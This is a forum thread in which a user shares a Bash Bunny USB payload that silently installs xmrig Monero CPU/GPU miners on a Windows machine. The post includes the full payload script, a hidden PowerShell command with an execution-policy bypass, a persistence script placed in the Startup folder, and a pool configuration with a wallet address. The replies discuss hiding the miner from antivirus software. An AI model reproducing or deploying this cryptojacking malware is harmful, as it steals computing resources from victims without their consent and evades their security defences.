[PAYLOAD] Silent CPU/GPU miner with persistence

[icarus255]

My first payload for the BB ?

I just wanted to start off by saying that I don’t have a background in IT, I’m just an enthusiast. I did this really just to get more familiar with scripting and security, so I welcome any comments/criticisms.

I should note that Ar1k88 posted mining payloads sometime ago so creds to him for the original idea.

I ended up writing my own scripts rather than editing his ones and made some improvements e.g. combining the CPU and GPU miners into one payload, adding persistence, silent mode, etc.

Some notes below if you care:

Silent Mode

You can set the miners to run in the background by editing the startup.vbs script and change “1” to “0” on line 3 & 4 or change the .json config file line 11 from “false” to “true”.

The CPU usage is also editable in the config file so you can set it to a lower value and avoid visibly slowing down the host’s performance (at the expense of the hash rate).

Once you execute the GPU miner, the computer will become almost non-responsive so definitely noticeable.

Persistence

I liked the idea of a VB script that runs on every startup which then subsequently initiates the miners. Windows of course didn’t like the idea of running scripts (I don’t know if this is a default security setting) but adding the vbs file as an exception to the execution policy seems to have fixed that (reference line 16 of run.ps1).

Instructions

You will need to download the xmrig binaries (or compile from source). Your browser and/or AV will most likely try to block the downloads. Windows Defender doesn't seem to mind though.

https://github.com/xmrig/xmrig/releases

https://github.com/xmrig/xmrig-nvidia

(sorry I forgot to add AMD support but it’s getting late and I have work tomorrow)

Copy the downloaded exe files (xmrig.exe and xmrig-nvidia.exe)  and the following files into switch 2 folder in BB:

payload.txt

# Title:         Silent Monero Miner (with persistence)
# Description:   Monero CPU miner (https://github.com/xmrig), copies the miner and config files to local disk, and adds a script to startup
# Author:        icarus255
# Props:	 0dyss3us (KeenanV) - I like his idea of adding the VB script to startup
# Version:       1.0
# Category:      Mining
# Target:        Windows 10
# Attackmodes:   HID, Storage
# Comments: 	 You will need to download the binaries from (https://github.com/xmrig/) or compile from source
# Silent mode:   You can start in silent mode (background) by changing config.json line 16: "background": false, -> "background": true,

#Setup
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION

#Wait for drive recognition
Q delay 4500

#Run the Powershell script starts the miners, copies the files to local disk, and adds to startup.
LED ATTACK
RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
LED FINISH

run.ps1

$Drive = (Get-WMIObject Win32_Volume | ? { $_.Label -eq 'BashBunny' }).name
$user= $env:UserName
$cpuminer = $Drive + "payloads\switch2\xmrig.exe"
$configfile = $Drive + "payloads\switch2\config.json"
$startupscript = $Drive + "payloads\switch2\startup.vbs"
$nvidiaminer = $Drive + "payloads\switch2\xmrig-nvidia.exe"
$StartupFolder = ("C:\Users\" + $user + "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup")
$LocalFolder = ("C:\MoneroTest")

Set-Location -Path $Drive + "payloads\switch2"
copy-item -Path $cpuminer -Destination (new-item -type directory $LocalFolder) -force -ea 0
copy-item $configfile -Destination $LocalFolder
copy-item $nvidiaminer -Deistnation $LocalFolder
copy-item $startupscript -Destination $StartupFolder

Unblock-File -Path $StartupFolder + "startup.vbs"
Set-Location -Path $StartupFolder
Start-Process cmd -ArgumentList "/c start startup.vbs"

 

config.json

{
    "algo": "cryptonight",
    "api": {
        "port": 0,
        "access-token": null,
        "worker-id": null,
        "ipv6": false,
        "restricted": true
    },
    "av": 0,
    "background": false,
    "colors": true,
    "cpu-affinity": null,
    "cpu-priority": null,
    "donate-level": 5,
    "huge-pages": true,
    "hw-aes": null,
    "log-file": null,
    "max-cpu-usage": 75,
    "pools": [
        {
            "url": "pool.minexmr.com:4444",
            "user": "424MefYkUWB16pj42Fcsu1DVeGyywsoeY96oQkLcokoKSU2WyywLNdRXj2ms7y2JQk7c4QpTtsxZsdspHbWiwzc91rbBCjL",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": false,
            "variant": 1
        }
    ],
    "print-time": 60,
    "retries": 5,
    "retry-pause": 5,
    "safe": false,
    "threads": null,
    "user-agent": null,
    "watch": false
}

 

startup.vbs

Dim WshShell
Set WshShell = WScript.CreateObject("WScript.shell")
WshShell.Run "powershell.exe C:\MoneroTest\xmrig.exe", 1, False
WshShell.Run "powershell.exe C:\MoneroTest\xmrig-nvidia.exe", 1, False

[MrMyFriend]

Hi Icarus!

Some time ago while i was giving a look to Ar1k88 payload I had your same idea!

I’m also just an IT enthusiast, with a completed unrelated job to this environment, but I find your payload very interesting. Congrats! I can’t wait to have some free time to check it out. 

 

[9ShadesLeft]

For those of us (me) who are new to this stuff.

What is a CPU / GPU miner? I would assume for something either for Zombifying a PC or Bitcoin mining?

Beyond that, I have no clue!

Thank you for dealing with my being nieve! 

[icarus255]

On 1/17/2019 at 1:42 PM, 9ShadesLeft said:

For those of us (me) who are new to this stuff.

What is a CPU / GPU miner? I would assume for something either for Zombifying a PC or Bitcoin mining?

Beyond that, I have no clue!

Thank you for dealing with my being nieve! 

Mining can refer to any sort of crypto mining but in this instance we are mining Monero. Monero is a good choice because it's impossible to trace (or so they say) and you can mine it with a CPU.

I wrote this for fun and when crypto mining was the cool thing to do. I would still like to figure out how to crypt the miner so the AV doesn't pick it up but don't hold you breath for that one 😉

[MrMyFriend]

I was kind of busy in the last period, but still looking forward giving this a try at the end of this or next week. Making the miner AV undetectable will be definitely the next thing to do 

[icarus255]

5 minutes ago, MrMyFriend said:

I was kind of busy in the last period, but still looking forward giving this a try at the end of this or next week. Making the miner AV undetectable will be definitely the next thing to do 

Yea that has always been an end goal for this little project but crypting miners is a big step from writing simple startup scripts. I looked into this a while back and I had some general ideas on how to approach it but not sure if my coding skills are up to the challenge.

Fuck it, you have inspired me. I'm just going to no-life this for a month or so. What's the worst that could happen? 🙂

[spamman63]

I've been testing the script on my PC and it seems to get jammed when it tries to open startup.vbs, giving the message "Windows cannot find 'startup.vbs'. Make sure you typed the name correctly, and then try again." Send help

[Jack823933]

On 2/18/2019 at 9:39 AM, icarus255 said:

Yea that has always been an end goal for this little project but crypting miners is a big step from writing simple startup scripts. I looked into this a while back and I had some general ideas on how to approach it but not sure if my coding skills are up to the challenge.

Fuck it, you have inspired me. I'm just going to no-life this for a month or so. What's the worst that could happen? 🙂

still waiting for it bro 😢